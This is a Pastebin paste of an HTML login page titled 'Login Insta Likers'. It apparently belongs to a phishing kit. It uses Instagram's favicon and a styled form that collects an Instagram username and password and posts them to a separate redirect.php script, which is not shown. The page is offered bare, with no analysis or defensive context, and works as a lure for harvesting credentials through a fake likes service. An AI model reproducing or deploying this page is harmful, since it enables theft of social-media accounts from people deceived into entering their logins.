Advertisement
Guest User

index.php

a guest
Nov 16th, 2016
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.94 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>Login Insta Likers</title>
  5. <meta charset="utf-8">
  6. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  7. <meta name="viewport" content="width=device-width, initial-scale=1">
  8. <link rel="Shortcut Icon" type="image/x-icon" href="//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.ico/dfa85bb1fd63.ico">
  9. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
  10. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
  11. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  12. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  13. <style>
  14. body {
  15. background: #EBF1F4;
  16. }
  17. .container {
  18. padding-right: 35px;
  19. padding-left: 35px;
  20. margin-right: auto;
  21. margin-left: auto;
  22. padding-top: 150px;
  23. width:50%;
  24. }
  25. .button {
  26. background-color: #097EED;
  27. border: none;
  28. color: white;
  29. padding: 6px 16px;
  30. text-align: center;
  31. text-decoration: none;
  32. display: inline-block;
  33. font-size: 16px;
  34. margin: 4px 2px;
  35. cursor: pointer;
  36. }
  37. </style>
  38. </head>
  39. <body>
  40. <div class="container">
  41. <div class="panel panel-info">
  42. <div class="panel-heading"><center><h3>Login Insta Likers</h3></center></div>
  43. <div class="panel-body">
  44. <form method="post" action="redirect.php">
  45. <label for="ew_username">Username :</label> <input type="text" class="form-control" id="ew_username" name="username" placeholder="Username" autocapitalize="off" autocomplete="off" required /><br>
  46. <label for="ew_password">Password :</label> <input type="password" class="form-control" id="ew_password" name="password" placeholder="Password" autocapitalize="off" autocomplete="off" required /><br>
  47. <center><input class="button" type="submit" name="login" value="Log in" /></center>
  48. </form>
  49. </div>
  50. </div>
  51. </div>
  52. </body>
  53. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement